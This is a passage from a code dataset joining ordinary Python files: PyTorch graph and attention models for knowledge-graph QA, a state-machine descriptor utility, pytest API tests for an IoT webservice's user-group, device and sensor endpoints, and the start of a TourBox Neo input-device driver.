he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = self.q2h(he_ques)
he_src = self.k2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg)
return pred
class BAN(nn.Module):
def __init__(self, cfg, args):
super(BAN, self).__init__()
self.cfg = cfg
self.n_hidden = cfg["MODEL"]["NUM_HIDDEN"]
self.n_head = cfg["MODEL"]["NUM_HEAD"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.n_hop = args.n_hop
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.max_num_hk = cfg["MODEL"]["NUM_MAX_HK_{}H".format(self.n_hop)]
self.max_num_hknode = 1
self.max_num_hqnode = 1
self.i2e = ClassEmbedding(cfg)
self.q2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hqnode, self.n_hidden
)
self.k2h = torch.nn.Linear(
self.word_emb_size * self.max_num_hknode, self.n_hidden
)
self.h2att = torch.nn.Linear(self.n_hidden, self.n_head)
self.softmax_att = torch.nn.Softmax(dim=2)
self.fc_out = torch.nn.Linear(self.n_hidden * self.n_head, self.n_out)
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["INP_DROPOUT"])
self.ans_selector = AnswerSelector(cfg)
def multihead_att(self, he_ques, he_src, q2h, s2h):
num_batch = he_ques.shape[0]
num_he_ques = he_ques.shape[1]
num_he_src = he_src.shape[1]
he_ques = torch.reshape(self.i2e(he_ques), (num_batch, num_he_ques, -1))
he_src = torch.reshape(self.i2e(he_src), (num_batch, num_he_src, -1))
he_ques = q2h(he_ques)
he_src = s2h(he_src)
he_ques = self.dropout(he_ques)
he_src = self.dropout(he_src)
he_ques = he_ques.permute(0, 2, 1)
he_src = he_src.permute(0, 2, 1)
he_ques_selfatt = he_ques.unsqueeze(3)
he_src_selfatt = he_src.unsqueeze(2)
self_mul = torch.matmul(he_ques_selfatt, he_src_selfatt)
self_mul = self_mul.permute(0, 2, 3, 1)
att_map = self.h2att(self_mul)
att_map = att_map.permute(0, 3, 1, 2)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques * num_he_src))
att_map = self.softmax_att(att_map)
att_map = torch.reshape(att_map, (-1, self.n_head, num_he_ques, num_he_src))
he_ques = he_ques.unsqueeze(2)
he_src = he_src.unsqueeze(3)
for i in range(self.n_head):
att_g = att_map[:, i : i + 1, :, :]
att_g_t = att_g.repeat([1, self.n_hidden, 1, 1])
att_out = torch.matmul(he_ques, att_g_t)
att_out = torch.matmul(att_out, he_src)
att_out = att_out.squeeze(-1)
att_out_sq = att_out.squeeze(-1)
if i == 0:
output = att_out_sq
else:
output = torch.cat((output, att_out_sq), dim=1)
output = self.fc_out(output)
pred = self.ans_selector(output)
return pred, att_map
def forward(self, batch):
he_ques = batch[0]
he_kg = batch[1]
pred, att_map = self.multihead_att(he_ques, he_kg, self.q2h, self.k2h)
return pred
class GGNN(nn.Module):
"""
Reimplementation of Gated Graph Sequence Neural Networks (GGNN) by <NAME>
Implementation based on https://arxiv.org/abs/1511.05493
"""
def __init__(self, cfg, args, n_node):
super(GGNN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.annotation_dim = cfg["MODEL"]["NUM_ANNO"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_edge = cfg["MODEL"]["NUM_EDGE"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.max_num_kg = n_node
self.max_num_q = cfg["MODEL"]["NUM_MAX_Q"]
self.i2e = ClassEmbedding(cfg)
self.fc_qenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_kenc = nn.Linear(self.n_input + self.annotation_dim, self.hidden_dim)
self.fc_in = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.fc_out = nn.Linear(self.hidden_dim, self.hidden_dim * self.n_edge)
self.gated_update_kg = GatedPropagation(
self.hidden_dim, self.max_num_kg, self.n_edge
)
self.graph_aggregate_kg = GraphFeature(
self.hidden_dim, self.max_num_kg, self.n_edge, self.annotation_dim
)
self.gated_update_ques = GatedPropagation(
self.hidden_dim, self.max_num_q, self.n_edge
)
self.graph_aggregate_ques = GraphFeature(
self.hidden_dim, self.max_num_q, self.n_edge, self.annotation_dim
)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
"""
batch: adj_matrix, annotation, entity_rep, answer
init state x: [batch_size, num_node, hidden_size]
        annotation a: [batch_size, num_node, 1]
adj matrix m: [batch_size, num_node, num_node * n_edge_types * 2]
output out: [batch_size, n_label]
"""
ques = batch[0]
adjmat_ques = batch[1]
ques_anno = batch[2]
kg = batch[3]
adjmat_kg = batch[4]
kg_anno = batch[5]
kg = self.i2e(kg)
ques = self.i2e(ques)
kg = torch.cat((kg, kg_anno), 2)
ques = torch.cat((ques, ques_anno), 2)
kg = self.fc_kenc(kg)
ques = self.fc_qenc(ques)
for i in range(self.n_steps):
in_states = self.fc_in(kg)
out_states = self.fc_out(kg)
in_states = (
in_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_kg, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_kg * self.n_edge, self.hidden_dim
)
kg = self.gated_update_kg(in_states, out_states, kg, adjmat_kg)
for i in range(self.n_steps):
in_states = self.fc_in(ques)
out_states = self.fc_out(ques)
in_states = (
in_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
in_states = in_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
out_states = (
out_states.view(-1, self.max_num_q, self.hidden_dim, self.n_edge)
.transpose(2, 3)
.transpose(1, 2)
.contiguous()
)
out_states = out_states.view(
-1, self.max_num_q * self.n_edge, self.hidden_dim
)
ques = self.gated_update_ques(in_states, out_states, ques, adjmat_ques)
kg_out = self.graph_aggregate_kg(torch.cat((kg, kg_anno), 2))
ques_out = self.graph_aggregate_ques(torch.cat((ques, ques_anno), 2))
output = torch.cat((kg_out, ques_out), axis=1)
output = self.fc_output(output)
pred = self.ans_selector(output)
return pred
class GraphFeature(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge, n_anno):
super(GraphFeature, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.n_anno = n_anno
self.fc_i = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.fc_j = nn.Linear(self.hidden_dim + self.n_anno, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
x_sigm = self.sigmoid(self.fc_i(x))
x_tanh = self.tanh(self.fc_j(x))
x_new = (x_sigm * x_tanh).sum(1)
return self.tanh(x_new)
class GatedPropagation(nn.Module):
def __init__(self, hidden_dim, n_node, n_edge):
super(GatedPropagation, self).__init__()
self.hidden_dim = hidden_dim
self.n_node = n_node
self.n_edge = n_edge
self.gate_r = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.gate_z = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.trans = nn.Linear(self.hidden_dim * 3, self.hidden_dim)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x_in, x_out, x_curt, matrix):
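        # GRU-style propagation step: aggregate messages along the incoming and outgoing
        # edge blocks of the adjacency matrix, then mix them with the current node state
        # through update (z) and reset (r) gates.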
matrix_in = matrix[:, :, : self.n_node * self.n_edge]
matrix_out = matrix[:, :, self.n_node * self.n_edge :]
a_in = torch.bmm(matrix_in.float(), x_in)
a_out = torch.bmm(matrix_out.float(), x_out)
a = torch.cat((a_in, a_out, x_curt), 2)
z = self.sigmoid(self.gate_z(a))
r = self.sigmoid(self.gate_r(a))
joint_input = torch.cat((a_in, a_out, r * x_curt), 2)
h_hat = self.tanh(self.trans(joint_input))
output = (1 - z) * x_curt + z * h_hat
return output
class GCN(torch.nn.Module):
def __init__(self, cfg, arg):
super(GCN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.i2e = ClassEmbedding(cfg)
self.q_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.q_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.kg_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.kg_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
ques_idxs = batch[0]
ques_adj = batch[1]
kg_idxs = batch[2]
kg_adj = batch[3]
ques_emb = self.i2e(ques_idxs)
kg_emb = self.i2e(kg_idxs)
ques_emb = self.q_gcn1(ques_emb, ques_adj)
ques_emb = self.q_gcn2(ques_emb, ques_adj)
ques_emb = torch.sum(ques_emb, axis=1)
kg_emb = self.q_gcn1(kg_emb, kg_adj)
kg_emb = self.q_gcn2(kg_emb, kg_adj)
kg_emb = torch.sum(kg_emb, axis=1)
last_kg = torch.cat([kg_emb, ques_emb], dim=1)
output = self.fc_output(last_kg)
pred = self.ans_selector(output)
return pred
class DenseGCNConv(torch.nn.Module):
def __init__(self, in_channels, out_channels, improved=False, bias=True):
super(DenseGCNConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.improved = improved
self.weight = nn.Parameter(torch.Tensor(self.in_channels, self.out_channels))
self.register_parameter("gcn_weight", self.weight)
if bias:
self.bias = nn.Parameter(torch.Tensor(self.out_channels))
self.register_parameter("gcn_bias", self.bias)
self.reset_parameters()
def reset_parameters(self):
utils.glorot(self.weight)
utils.zeros(self.bias)
def forward(self, x, adj, mask=None, add_loop=True):
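        # Dense GCN layer: optionally add self-loops, linearly transform the node
        # features, then propagate with the symmetrically normalized adjacency
        # D^{-1/2} A D^{-1/2}, followed by bias and an optional node mask.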
x = x.float()
adj = adj.float()
x = x.unsqueeze(0) if x.dim() == 2 else x
adj = adj.unsqueeze(0) if adj.dim() == 2 else adj
B, N, _ = adj.size()
if add_loop:
adj = adj.clone()
idx = torch.arange(N, dtype=torch.long, device=adj.device)
adj[:, idx, idx] = 1 if not self.improved else 2
out = torch.matmul(x, self.weight)
deg_inv_sqrt = adj.sum(dim=-1).clamp(min=1).pow(-0.5)
adj = deg_inv_sqrt.unsqueeze(-1) * adj * deg_inv_sqrt.unsqueeze(-2)
out = torch.matmul(adj, out)
if self.bias is not None:
out = out + self.bias
if mask is not None:
out = out * mask.view(B, N, 1).to(x.dtype)
return out
class MemNet(nn.Module):
def __init__(self, cfg, args):
super(MemNet, self).__init__()
self.cfg = cfg
self.args = args
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["DROPOUT"])
self.i2e_ab = ClassEmbedding(cfg)
if cfg["MODEL"]["SHARE_FLAG"] == True:
self.i2e_c = self.i2e_ab
else:
self.i2e_c = ClassEmbedding(cfg)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
q = batch[0]
x = batch[1]
bs = x.size(0)
story_len = x.size(1)
s_sent_len = x.size(2)
x = x.view(bs * story_len, -1)
u = self.dropout(self.i2e_ab(q))
u = torch.sum(torch.sum(u, 1), 1)
for k in range(self.n_steps):
m = self.dropout(self.i2e_ab(x))
m = m.view(bs, story_len, s_sent_len, -1)
m = torch.sum(m, 2)
c = self.dropout(self.i2e_c(x))
c = c.view(bs, story_len, s_sent_len, -1)
c = torch.sum(c, 2)
            p = torch.bmm(m, u.unsqueeze(2)).squeeze(2)
p = F.softmax(p, -1).unsqueeze(1)
o = torch.bmm(p, c).squeeze(1)
u = o + u
pred = self.ans_selector(u)
return pred
| StarcoderdataPython |
181397 | """Extra utilities for state machines, to make them more usable."""
from weakref import WeakKeyDictionary
class ProxyString(str):
"""String that proxies every call to nested machine."""
def __new__(cls, value, machine):
"""Create new string instance with reference to given machine."""
string = super(cls, cls).__new__(cls, value)
string.state_machine = machine
return string
def __getattr__(self, name):
"""Proxy call to machine."""
return getattr(self.state_machine, name)
class PropertyMachine(object):
"""Descriptor to help using machines as properties."""
def __init__(self, machine_type):
"""Create descriptor."""
self.memory = WeakKeyDictionary()
self.machine_type = machine_type
def __set__(self, instance, value):
"""Set state to machine."""
self.check_memory(instance)
self.memory[instance].set_(value)
def __get__(self, instance, _type=None):
"""Get machine state."""
if instance is None:
return self
self.check_memory(instance)
machine = self.memory[instance]
return ProxyString(machine.actual_state.value, machine)
def check_memory(self, instance):
try:
self.memory[instance]
except KeyError:
self.memory[instance] = self.machine_type()
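
# Minimal usage sketch (not part of the original module): a stand-in machine type that
# exposes the set_() method and actual_state.value attribute this descriptor expects.
class _ToyState(object):
    def __init__(self, value):
        self.value = value

class _ToyMachine(object):
    def __init__(self):
        self.actual_state = _ToyState('off')

    def set_(self, value):
        self.actual_state = _ToyState(value)

class _Device(object):
    state = PropertyMachine(_ToyMachine)

if __name__ == '__main__':
    device = _Device()
    device.state = 'on'                      # proxied to _ToyMachine.set_('on')
    print(device.state)                      # 'on' (a ProxyString)
    print(device.state.actual_state.value)   # attribute access proxied to the machine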
| StarcoderdataPython |
1703162 | <reponame>michalkoziara/IoT-RESTful-Webservice
import json
import pytest
from app.main.model.user_group import UserGroup
from app.main.repository.user_group_repository import UserGroupRepository
from app.main.util.auth_utils import Auth
from app.main.util.constants import Constants
def test_get_list_of_user_groups_should_return_list_of_names_when_valid_request(
client,
insert_device_group,
insert_user,
insert_user_group,
get_user_group_default_values
):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
first_user_group_values = get_user_group_default_values()
second_user_group_values = get_user_group_default_values()
third_user_group_values = get_user_group_default_values()
first_user_group_values['name'] = 'Master'
second_user_group_values['name'] = 'second'
third_user_group_values['name'] = 'third'
second_user_group_values['id'] += 1
third_user_group_values['id'] += 2
first_user_group_values['users'] = [user]
first_user_group = insert_user_group(first_user_group_values)
second_user_group = insert_user_group(second_user_group_values)
third_user_group = insert_user_group(third_user_group_values)
first_user_group.users = [user]
device_group.user_groups = [first_user_group, second_user_group, third_user_group]
expected_output_values = [
{'isAssignedTo': True, 'name': 'Master'},
{'isAssignedTo': False, 'name': 'second'},
{'isAssignedTo': False, 'name': 'third'}
]
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert response_data['userGroups'] == expected_output_values
def test_get_list_of_user_groups_should_return_list_of_names_when_valid_request_and_user_is_admin(
client,
insert_device_group,
insert_admin,
insert_user_group,
get_user_group_default_values
):
content_type = 'application/json'
device_group = insert_device_group()
admin = insert_admin()
first_user_group_values = get_user_group_default_values()
second_user_group_values = get_user_group_default_values()
third_user_group_values = get_user_group_default_values()
first_user_group_values['name'] = 'Master'
second_user_group_values['name'] = 'second'
third_user_group_values['name'] = 'third'
second_user_group_values['id'] += 1
third_user_group_values['id'] += 2
first_user_group = insert_user_group(first_user_group_values)
second_user_group = insert_user_group(second_user_group_values)
third_user_group = insert_user_group(third_user_group_values)
device_group.user_groups = [first_user_group, second_user_group, third_user_group]
assert device_group.admin_id == admin.id
expected_output_values = [
{'isAssignedTo': False, 'name': 'Master'},
{'isAssignedTo': False, 'name': 'second'},
{'isAssignedTo': False, 'name': 'third'}
]
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert response_data['userGroups'] == expected_output_values
def test_get_list_of_user_groups_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key/user-groups',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
@pytest.mark.parametrize("state_type, state, state_value", [
('Decimal', 1, 1),
('Boolean', 1, True)
])
def test_get_list_of_executive_devices_should_return_device_info_when_valid_request_and_state_type_not_enum(
state_type, state, state_value,
client,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type,
insert_user,
get_user_group_default_values,
insert_user_group,
get_formula_default_values,
insert_formula):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
formula = insert_formula()
executive_device_values = get_executive_device_default_values()
executive_device_values['state'] = state
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = state_type
insert_executive_type(executive_type_values)
executive_device = insert_executive_device(executive_device_values)
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == executive_device.name
assert device_info['deviceKey'] == executive_device.device_key
assert device_info['isActive'] == executive_device.is_active
assert device_info['state'] == state_value
assert device_info['isFormulaUsed'] == executive_device.is_formula_used
assert device_info['formulaName'] == formula.name
def test_get_list_of_executive_devices_should_return_device_info_when_valid_request_and_state_type_is_enum(
client,
insert_device_group,
get_executive_device_default_values,
insert_executive_device,
get_executive_type_default_values,
insert_executive_type,
insert_user,
get_user_group_default_values,
insert_user_group,
get_formula_default_values,
insert_formula,
insert_state_enumerator):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
formula = insert_formula()
state_enumerator = insert_state_enumerator()
executive_device_values = get_executive_device_default_values()
executive_device_values['state'] = state_enumerator.number
executive_type_values = get_executive_type_default_values()
executive_type_values['state_type'] = 'Enum'
insert_executive_type(executive_type_values)
executive_device = insert_executive_device(executive_device_values)
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == executive_device.name
assert device_info['deviceKey'] == executive_device.device_key
assert device_info['isActive'] == executive_device.is_active
assert device_info['state'] == state_enumerator.text
assert device_info['isFormulaUsed'] == executive_device.is_formula_used
assert device_info['formulaName'] == formula.name
def test_get_list_of_executive_devices_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key' + '/user-groups/' + 'user_group_name' + '/executive-devices',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
@pytest.mark.parametrize("reading_type, reading, reading_value", [
('Decimal', 1, 1),
('Boolean', 1, True)
])
def test_get_list_of_sensors_should_return_sensors_info_when_valid_request_and_state_type_not_enum(
reading_type, reading, reading_value,
client,
insert_device_group,
get_sensor_default_values,
insert_sensor,
get_sensor_reading_default_values,
insert_sensor_reading,
get_sensor_type_default_values,
insert_sensor_type,
insert_user,
get_user_group_default_values,
insert_user_group
):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
reading_info = get_sensor_reading_default_values()
reading_info['value'] = reading
insert_sensor_reading(reading_info)
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = reading_type
insert_sensor_type(sensor_type_values)
sensor = insert_sensor()
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == sensor.name
assert device_info['deviceKey'] == sensor.device_key
assert device_info['isActive'] == sensor.is_active
assert device_info['sensorReadingValue'] == reading_value
def test_get_list_of_sensors_should_return_sensors_info_when_valid_request_and_state_type_is_enum(
client,
insert_device_group,
get_sensor_default_values,
insert_sensor,
get_sensor_reading_default_values,
insert_sensor_reading,
get_sensor_type_default_values,
insert_sensor_type,
insert_sensor_reading_enumerator,
insert_user,
get_user_group_default_values,
insert_user_group):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
user_group = insert_user_group(user_group_values)
reading_info = get_sensor_reading_default_values()
reading_info['value'] = 1
insert_sensor_reading(reading_info)
sensor_type_values = get_sensor_type_default_values()
sensor_type_values['reading_type'] = 'Enum'
insert_sensor_type(sensor_type_values)
reading_enumerator = insert_sensor_reading_enumerator()
sensor = insert_sensor()
response = client.get(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data is not None
assert isinstance(response_data, list)
device_info = response_data[0]
assert device_info['name'] == sensor.name
assert device_info['isActive'] == sensor.is_active
assert device_info['sensorReadingValue'] == reading_enumerator.text
def test_get_list_of_sensors_should_return_error_message_when_wrong_token(
client):
content_type = 'application/json'
response = client.get(
'/api/hubs/' + 'device_group_product_key' + '/user-groups/' + 'user_group_name' + '/sensors',
content_type=content_type,
headers={
'Authorization': 'Bearer test'
}
)
assert response is not None
assert response.status_code == 400
assert response.content_type == content_type
response_data = json.loads(response.data.decode())
assert response_data['errorMessage'] == "Invalid token."
def test_delete_user_group_should_delete_user_group_when_valid_request(
client,
insert_device_group,
get_sensor_default_values,
insert_admin,
insert_user_group,
insert_sensor_type):
content_type = 'application/json'
device_group = insert_device_group()
admin = insert_admin()
user_group = insert_user_group()
user_group_name = user_group.name
response = client.delete(
'/api/hubs/' + device_group.product_key + '/user-groups/' + user_group.name,
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response is not None
assert response.status_code == 200
assert response.content_type == content_type
user_group_in_db = UserGroupRepository.get_instance().get_user_group_by_name_and_device_group_id(
user_group_name,
device_group.id)
assert user_group_in_db is None
def test_create_user_group_should_create_user_group_in_device_group_when_valid_request(
client,
insert_device_group,
get_user_default_values,
insert_user,
get_user_group_default_values,
insert_user_group):
content_type = 'application/json'
device_group = insert_device_group()
user = insert_user()
user_group_values = get_user_group_default_values()
user_group_values['users'] = [user]
insert_user_group(user_group_values)
user_group_name = 'test user group name'
user_group_password = '<PASSWORD>'
response = client.post(
'/api/hubs/' + device_group.product_key + '/user-groups',
data=json.dumps(
{
"groupName": user_group_name,
"password": <PASSWORD>,
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 201
response_data = json.loads(response.data.decode())
assert not response_data
user_group = UserGroup.query.filter(UserGroup.name == user_group_name).all()
assert user_group
def test_create_user_group_should_return_error_message_when_invalid_request_data(
client,
insert_user):
content_type = 'application/json'
user = insert_user()
response = client.post(
'/api/hubs/' + 'not product key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name'
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_BAD_REQUEST
def test_create_user_group_should_return_error_message_when_invalid_request(
client,
insert_user):
content_type = 'application/json'
user = insert_user()
response = client.post(
'/api/hubs/' + 'not product key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(user.id, False)
}
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_PRODUCT_KEY_NOT_FOUND
def test_create_user_group_should_return_error_message_when_user_not_authorized(client):
content_type = 'application/json'
response = client.post(
'/api/hubs/' + 'product_key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
)
assert response
assert response.status_code == 400
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_USER_NOT_DEFINED
def test_create_user_group_should_return_no_privileges_error_message_when_user_is_admin(
client, insert_admin):
content_type = 'application/json'
admin = insert_admin()
response = client.post(
'/api/hubs/' + 'product_key' + '/user-groups',
data=json.dumps(
{
"groupName": 'user_group_name',
"password": '<PASSWORD>',
}
),
content_type=content_type,
headers={
'Authorization': 'Bearer ' + Auth.encode_auth_token(admin.id, True)
}
)
assert response
assert response.status_code == 403
response_data = json.loads(response.data.decode())
assert response_data
assert 'errorMessage' in response_data
assert response_data['errorMessage'] == Constants.RESPONSE_MESSAGE_USER_DOES_NOT_HAVE_PRIVILEGES
| StarcoderdataPython |
3280054 | <reponame>AlexandraAlter/tourboxneo
from dataclasses import dataclass
from evdev import UInput, ecodes as e
from pathlib import Path
import serial
import logging
logger = logging.getLogger(__name__)
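# Event byte layout, as used in Reader.tick() below: bit 7 (RELEASE_MASK) marks a
# button release, bit 6 (REVERSE_MASK) marks reverse rotation of a knob/dial, and
# the remaining bits select the control looked up via BYTEMAP.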
RELEASE_MASK = 0x80
REVERSE_MASK = 0x40
BUTTON_MASK = ~(RELEASE_MASK | REVERSE_MASK)
UEVENT_PRODUCT = 'PRODUCT=2e3c/5740/200'
@dataclass
class Button:
group: str
key: str
byte: int
def __repr__(self):
byte = hex(self.byte)
return f'Button({self.group}.{self.key} b{byte})'
BUTTONS = [
Button('prime', 'side', 0x01),
Button('prime', 'top', 0x02),
Button('prime', 'tall', 0x00),
Button('prime', 'short', 0x03),
Button('prime', 'tall_x2', 0x18),
Button('prime', 'side_x2', 0x21),
Button('prime', 'top_x2', 0x1f),
Button('prime', 'short_x2', 0x1c),
Button('prime', 'side_top', 0x20),
Button('prime', 'side_tall', 0x1b),
Button('prime', 'side_short', 0x1e),
Button('prime', 'top_tall', 0x19),
Button('prime', 'top_short', 0x1d),
Button('prime', 'tall_short', 0x1a),
Button('kit', 'up', 0x10),
Button('kit', 'down', 0x11),
Button('kit', 'left', 0x12),
Button('kit', 'right', 0x13),
Button('kit', 'c1', 0x22),
Button('kit', 'c2', 0x23),
Button('kit', 'tour', 0x2a),
Button('kit', 'side_up', 0x14),
Button('kit', 'side_down', 0x15),
Button('kit', 'side_left', 0x16),
Button('kit', 'side_right', 0x17),
Button('kit', 'top_up', 0x2b),
Button('kit', 'top_down', 0x2c),
Button('kit', 'top_left', 0x2d),
Button('kit', 'top_right', 0x2e),
Button('kit', 'tall_c1', 0x24),
Button('kit', 'tall_c2', 0x25),
Button('kit', 'short_c1', 0x39),
Button('kit', 'short_c2', 0x3a),
Button('knob', 'press', 0x37),
Button('knob', 'turn', 0x04),
Button('knob', 'side_turn', 0x08),
Button('knob', 'top_turn', 0x07),
Button('knob', 'tall_turn', 0x05),
Button('knob', 'short_turn', 0x06),
Button('scroll', 'press', 0x0a),
Button('scroll', 'turn', 0x09),
Button('scroll', 'side_turn', 0x0e),
Button('scroll', 'top_turn', 0x0d),
